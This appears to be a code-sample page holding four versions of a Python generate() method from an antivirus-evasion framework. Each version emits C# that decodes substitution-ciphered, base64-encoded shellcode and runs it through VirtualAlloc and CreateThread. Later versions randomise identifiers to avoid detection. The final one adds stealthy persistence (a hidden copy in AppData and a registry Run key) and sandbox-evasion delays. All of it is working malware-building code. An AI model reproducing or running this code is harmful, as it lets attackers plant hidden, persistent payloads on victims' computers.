示例#1
0
    def generate(self):

        shellcode = self.shellcode.generate()

        # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
        key = ''.join(
            sorted(list(string.ascii_letters),
                   key=lambda *args: random.random()))
        base64payload = encryption.b64sub(shellcode, key)

        payloadCode = "using System; using System.Net; using System.Text; using System.Linq; using System.Net.Sockets;"
        payloadCode += "using System.Collections.Generic; using System.Runtime.InteropServices;\n"
        payloadCode += "namespace payload { class Program { private static string d(string t, string key) {\n"
        payloadCode += "string b = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n"
        payloadCode += "string r = \"\"; Dictionary<char, char> d = new Dictionary<char, char>();\n"
        payloadCode += "for (int i = 0; i < b.Length; ++i){ d.Add(key[i], b[i]); }\n"
        payloadCode += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { r += d[t[i]];}\n"
        payloadCode += "else { r += t[i]; }} return r; }\n"
        payloadCode += "static public string DecodeFrom64(string encodedData) {\n"
        payloadCode += "byte[] encodedDataAsBytes = System.Convert.FromBase64String(encodedData);\n"
        payloadCode += "string returnValue = System.Text.ASCIIEncoding.ASCII.GetString(encodedDataAsBytes);\n"
        payloadCode += "return returnValue; }\n"
        payloadCode += "static void Main() {\n"
        payloadCode += "string base64payload = \"%s\";\n" % (base64payload)
        payloadCode += "string key = \"%s\";\n" % (key)
        payloadCode += "string p = (DecodeFrom64(d(base64payload, key)).Replace(\"\\\\\", \",0\")).Substring(1);\n"
        payloadCode += "string[] chars = p.Split(',').ToArray();\n"
        payloadCode += "byte[] shellcode = new byte[chars.Length];\n"
        payloadCode += "for (int i = 0; i < chars.Length; ++i) { shellcode[i] = Convert.ToByte(chars[i], 16); }\n"
        payloadCode += "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
        payloadCode += "Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);\n"
        payloadCode += "IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero;\n"
        payloadCode += "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\n"
        payloadCode += "WaitForSingleObject(hThread, 0xFFFFFFFF);}\n"
        payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport(\"kernel32\")]private static extern IntPtr CreateThread(
          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId);
        [DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } }\n"""

        return payloadCode
	def generate(self):
		
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
		key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
		base64payload = encryption.b64sub(Shellcode,key)
		
		payloadCode = "using System; using System.Net; using System.Text; using System.Linq; using System.Net.Sockets;" 
		payloadCode += "using System.Collections.Generic; using System.Runtime.InteropServices;\n"
		payloadCode += "namespace payload { class Program { private static string d(string t, string key) {\n"
		payloadCode += "string b = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n"
		payloadCode += "string r = \"\"; Dictionary<char, char> d = new Dictionary<char, char>();\n"
		payloadCode += "for (int i = 0; i < b.Length; ++i){ d.Add(key[i], b[i]); }\n"
		payloadCode += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { r += d[t[i]];}\n"
		payloadCode += "else { r += t[i]; }} return r; }\n"
		payloadCode += "static public string DecodeFrom64(string encodedData) {\n"
		payloadCode += "byte[] encodedDataAsBytes = System.Convert.FromBase64String(encodedData);\n"
		payloadCode += "string returnValue = System.Text.ASCIIEncoding.ASCII.GetString(encodedDataAsBytes);\n"
		payloadCode += "return returnValue; }\n"
		payloadCode += "static void Main() {\n"
		payloadCode += "string base64payload = \"%s\";\n" % (base64payload)
		payloadCode += "string key = \"%s\";\n" %(key)
		payloadCode += "string p = (DecodeFrom64(d(base64payload, key)).Replace(\"\\\\\", \",0\")).Substring(1);\n"
		payloadCode += "string[] chars = p.Split(',').ToArray();\n"
		payloadCode += "byte[] shellcode = new byte[chars.Length];\n"
		payloadCode += "for (int i = 0; i < chars.Length; ++i) { shellcode[i] = Convert.ToByte(chars[i], 16); }\n"
		payloadCode += "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
		payloadCode += "Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);\n"
		payloadCode += "IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero;\n"
		payloadCode += "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\n"
		payloadCode += "WaitForSingleObject(hThread, 0xFFFFFFFF);}\n"
		payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
		payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport(\"kernel32\")]private static extern IntPtr CreateThread(
          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId);
        [DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } }\n"""

		return payloadCode
    def generate(self):
        
        Shellcode = self.shellcode.generate()
        
        # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
        key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
        base64payload = encryption.b64sub(Shellcode,key)

        # randomize all our variable names, yo'
        namespaceName = helpers.randomString()
        className = helpers.randomString()
        shellcodeName = helpers.randomString()
        funcAddrName = helpers.randomString()

        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        baseStringName = helpers.randomString()
        targetStringName = helpers.randomString()

        decodeFuncName = helpers.randomString()
        base64DecodeFuncName = helpers.randomString()
        dictionaryName = helpers.randomString()


        payloadCode = "using System; using System.Net; using System.Text; using System.Linq; using System.Net.Sockets;" 
        payloadCode += "using System.Collections.Generic; using System.Runtime.InteropServices;\n"

        payloadCode += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (namespaceName, className, decodeFuncName)
        payloadCode += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" %(baseStringName)
        payloadCode += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" %(targetStringName,dictionaryName)
        payloadCode += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" %(baseStringName,dictionaryName,baseStringName)
        payloadCode += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" %(targetStringName, dictionaryName)
        payloadCode += "else { %s += t[i]; }} return %s; }\n" %(targetStringName,targetStringName)


        encodedDataName = helpers.randomString()
        encodedBytesName = helpers.randomString()

        payloadCode += "static public string %s(string %s) {\n" %(base64DecodeFuncName,encodedDataName)
        payloadCode += "byte[] %s = System.Convert.FromBase64String(%s);\n" %(encodedBytesName,encodedDataName)
        payloadCode += "return System.Text.ASCIIEncoding.ASCII.GetString(%s);}\n" %(encodedBytesName)

        base64PayloadName = helpers.randomString()
        payloadCode += "static void Main() {\n"
        payloadCode += "string %s = \"%s\";\n" % (base64PayloadName, base64payload)
        payloadCode += "string key = \"%s\";\n" %(key)
        payloadCode += "string p = (%s(%s(%s, key)).Replace(\"\\\\\", \",0\")).Substring(1);\n" %(base64DecodeFuncName, decodeFuncName, base64PayloadName)
        payloadCode += "string[] chars = p.Split(',').ToArray();\n"
        payloadCode += "byte[] %s = new byte[chars.Length];\n" %(shellcodeName)
        payloadCode += "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n"  %(shellcodeName)

        payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName)
        payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
        payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]

        # payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

        return payloadCode
    def generate(self):

        Shellcode = self.shellcode.generate(self.required_options)

        # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
        key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
        base64payload = encryption.b64sub(Shellcode,key)

        # randomize all our variable names, yo'
        namespaceName = helpers.randomString()
        className = helpers.randomString()
        shellcodeName = helpers.randomString()
        funcAddrName = helpers.randomString()

        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        baseStringName = helpers.randomString()
        targetStringName = helpers.randomString()

        decodeFuncName = helpers.randomString()
        base64DecodeFuncName = helpers.randomString()
        dictionaryName = helpers.randomString()

        runShellCode = helpers.randomString()
 
 
        persistanceFuncName = helpers.randomString()
        fileNamePayload = helpers.randomString()
        startup = helpers.randomString()
        destFile = helpers.randomString()
	runBinderFile	= helpers.randomString()
        user = helpers.randomString()
        admin = helpers.randomString()
        reg = helpers.randomString()
        iFileName = helpers.randomString()
        regFileName = helpers.randomString()      

        hglobal = helpers.randomString()
        MAX_OP = helpers.randomString()
        cpt	= helpers.randomString()
        time1	= helpers.randomString()
        time2   = helpers.randomString()
 
 

        payloadCode = "using System; using System.IO; using System.Net; using System.Text; using System.Linq; using Microsoft.Win32; using System.Threading; using System.Diagnostics; using System.Net.Sockets;"
        payloadCode += "using System.Collections.Generic; using System.Security.Principal;using System.Runtime.InteropServices;\n"
        
	payloadCode += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (namespaceName, className, decodeFuncName)
        payloadCode += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" %(baseStringName)
        payloadCode += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" %(targetStringName,dictionaryName)
        payloadCode += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" %(baseStringName,dictionaryName,baseStringName)
        payloadCode += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" %(targetStringName, dictionaryName)
        payloadCode += "else { %s += t[i]; }} return %s; }\n" %(targetStringName,targetStringName)        
        
        payloadCode += "static public void %s()	{ \n"% (persistanceFuncName)
        payloadCode += "string %s = AppDomain.CurrentDomain.FriendlyName.ToString(); \n"% (fileNamePayload)
        payloadCode += "string %s = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); \n"% (startup)
        payloadCode += "string %s = System.IO.Path.Combine(%s, %s);\n"% (destFile,startup,fileNamePayload)
        payloadCode += "try { WindowsIdentity %s = WindowsIdentity.GetCurrent();\n"% (user)
        payloadCode += "WindowsPrincipal %s = new WindowsPrincipal(%s);"% (admin,user)
        payloadCode += "%s.IsInRole(WindowsBuiltInRole.Administrator); "% (admin)          
        payloadCode += "if (Directory.Exists(%s)) { if (!File.Exists(%s)) {\n"% (startup,destFile)
        payloadCode += "System.IO.File.Copy(%s, %s); \n"% (fileNamePayload,destFile)
        payloadCode += "File.SetAttributes(%s, FileAttributes.Hidden);\n"% (destFile)
        payloadCode += "RegistryKey %s = Registry.CurrentUser.CreateSubKey(@\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\");\n"% (reg)
        payloadCode += "int %s = %s.Length - 4;\n"% (iFileName,fileNamePayload)
        payloadCode += "string %s = %s.Substring(0, %s);\n"% (regFileName,fileNamePayload,iFileName)
        payloadCode += " %s.SetValue(%s, %s + @\"\\\" + %s);\n"% (reg,regFileName, startup,fileNamePayload)
        payloadCode += "%s.Close(); Process.Start(%s);Environment.Exit(0);"%(reg,destFile) 	
	payloadCode += "}}}finally{%s();}}"%(runShellCode)
	# get 12 random variables for the API imports
        r = [helpers.randomString() for x in xrange(12)]

	# payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
        payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); \n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])

	base64PayloadName = helpers.randomString()

        payloadCode += "static public void %s(){string %s = \"%s\";\n" % (runShellCode,base64PayloadName, base64payload)
        payloadCode += "string key = \"%s\";\n" %(key)
        payloadCode += "string p = (%s(%s(%s, key)).Replace(\"\\\\\", \",0\")).Substring(1);\n" %(base64DecodeFuncName, decodeFuncName, base64PayloadName)
        payloadCode += "string[] chars = p.Split(',').ToArray();\n"
        payloadCode += "byte[] %s = new byte[chars.Length];\n" %(shellcodeName)		     
        payloadCode += "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); } \n"  %(shellcodeName)
        payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length); \n" % (shellcodeName, funcAddrName, shellcodeName)
        payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero; \n" %(hThreadName, threadIdName, pinfoName)
        payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s); \n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)



        encodedDataName = helpers.randomString()
        encodedBytesName = helpers.randomString()

        payloadCode += "static public string %s(string %s) {\n" %(base64DecodeFuncName,encodedDataName)
        payloadCode += "byte[] %s = System.Convert.FromBase64String(%s);\n" %(encodedBytesName,encodedDataName)
        payloadCode += "return System.Text.ASCIIEncoding.ASCII.GetString(%s);}\n" %(encodedBytesName)
        	
        

        payloadCode += "static void Main() 	{\n"
        payloadCode += "IntPtr %s = Marshal.AllocHGlobal(400000000); int %s = 100000000; int %s = 0;\n" %(hglobal,MAX_OP,cpt)
        payloadCode += "if (%s != null ) { \n" %(hglobal)               
        payloadCode += "var %s = DateTime.Now.Millisecond; Thread.Sleep(25000); var %s = DateTime.Now.Millisecond;\n" %(time1,time2)
        payloadCode += "if ((%s < (%s + 120000))) { for (int i = 0; i < %s+1; i++)\n" %(time2,time1,MAX_OP)
        payloadCode += "{%s++; if (%s == %s) {\n" %(cpt,cpt,MAX_OP)
        payloadCode += 	"%s(); %s = Marshal.AllocCoTaskMem(0);}}}}}\n" %(persistanceFuncName,hglobal)      
        payloadCode += "}}" #End namespace

			

         
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payloadCode = encryption.arya(payloadCode)
            
        return payloadCode